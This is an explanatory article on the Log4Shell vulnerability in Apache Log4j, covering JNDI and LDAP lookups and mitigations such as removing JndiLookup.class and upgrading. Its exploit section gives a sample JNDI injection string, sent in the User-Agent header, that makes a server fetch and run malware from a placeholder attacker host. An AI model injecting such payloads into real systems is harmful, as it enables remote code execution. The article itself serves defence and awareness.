What is the Log4Shell Vulnerability and What Can You Do About It?

Shubham Sharma

What is the Log4Shell Vulnerability?

On December 09, 2021, Chen Zhaojun of the Alibaba Cloud Security Team discovered a zero-day vulnerability in Apache Log4J for version 2.0-beta9 to 2.14.1 It’s commonly known as CVE-2021-44228, or Log4Shell, or LogJam.Log4J uses the JNDI features in the configuration, log messages, and parameters that do not protect against attacker-controlled LDAP and other JNDI-related endpoints. For example, an attacker who can access logs or log message parameters can execute arbitrary code loaded from an LDAP server when message lookup substitution is enabled.This vulnerability can lead to Remote Code Execution (RCE), including the worst-case scenario where an attacker can inject malware to the server. This opens up the possibility for supply-chain attacks as well.Log4Shell has been given a CVSS3.0 score of 10.0, referred to as “Critical” Vulnerability.

Is it really such a big deal?

The short answer is: yes, absolutely. But let’s talk about why.All applications have some sort of mechanism to store event logs, mainly for forensic purposes, and in some cases for improving the efficiency of the application.But the flaw in the Log4j library means attacks can be triggered by any user data entered by the library. It includes any part of the HTTP request, including HTTP headers, application uploads, etc. Even if you don’t use Java applications, Log4J is the most commonly used library within databases, CRM Applications, Cloud services, or even in Data Centers. All of them use Java and a host of Java libraries.There can be many use cases where the software or any 3rd party application uses it in the background without being noticed. Exploits are easily and readily available on Github. Hundreds of bugs are being reported on BugCrowd and HackerOne at the time of writing this article.

What is Log4J?

Log4J is a reliable, fast, and flexible logging library written in Java, distributed under the Apache Software license. In addition, log4J has been ported in C, C ++, C #, Perl, Python, Ruby, and Eiffel languages.It stores logs for various applications ranging from online games like Minecraft, Steam to enterprise software like Apple iCloud and cloud data centers like AWS and Google Cloud.There are three main components of Log4J:Loggers: It is responsible for capturing logging information.Appenders: It is responsible for publishing logging information on preferred destinations.Layouts: It is responsible for formatting logging information in different styles as per the requirement of the application based on the parser.

What is LDAP?

LDAP (Lightweight Directory Access Protocol) is an open and cross-platform protocol that authenticates and interacts with directory services.LDAP provides the communication language that applications use to communicate with other directory service servers. Directory services store users, passwords, and computer accounts and share that information with other entities on the network.

What is JNDI?

The Java Naming and Directory Interface (JNDI) is a Java API for a directory service that allows Java software clients to find and view data and resources (in the form of Java objects) via a name. Like all Java APIs that interface with the host system, JNDI is independent of the underlying implementation. Additionally, it specifies a Service Provider Interface (SPI) that allows directory service implementations to be plugged into the framework. Information searched through JNDI may be provided by a server, a flat-file, or a database. The choice is dependent on the implementation used.Typical uses of JNDI include:

• Connecting a Java application to an external directory service (such as an address database or LDAP server).
• Allowing Java servlets to view configuration information provided by the hosting web container.

How does the exploit work?

A basic example that can be used is running a Java program in a command line where Log4J is used can be running the command: ${java: runtime} which shows the java version.Using the lookup function attacker can inject malware “malware.class” into the server using the following demonstrated example: ${jndi:ldap://{malicious_website}/a} over user-agent as it most common element used in any log, which can be entered without sanitization, else it can be used anywhere. This will then run the malicious Java code located at http://{malicious_website}/{malware.class}Attack Chain:

How can you mitigate the vulnerability?

Irrespective of how big or critical the issue is, it is easier to mitigate the risk. There are two common ways to eradicate the problems:1. Modifying status flags to secure logs

• For versions ranging from 2.0-beta9 to 2.10.0, remove JndiLookup.class from classpath:

zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class.

• For versions later than 2.10, set system property log4j2.formatMsgNoLookups to true, and set environment variable LOG4J_FORMAT_MSG_NO_LOOKUPS to true.

2. Updating Library

• Although it is recommended to upgrade the library to version 2.15.0, as per CVE, it observed that the Network DOS attack is still persistent due to this, for which separate CVE is assigned: CVE-2021-45046.
• So, as of writing this article, it is recommended to upgrade to version 2.16.0, which resolves the above-described issue too.

References:

• https://nvd.nist.gov/vuln/detail/CVE-2021-44228
• https://logging.apache.org/log4j/2.x/security.html
• https://portswigger.net/daily-swig/log4shell-vulnerability-poses-critical-threat-to-applications-using-ubiquitous-java-logging-package-apache-log4j
• https://www.radware.com/security/threat-advisories-and-attack-reports/log4shell-critical-log4j-vulnerability/
• https://jfrog.com/blog/log4shell-0-day-vulnerability-all-you-need-to-know/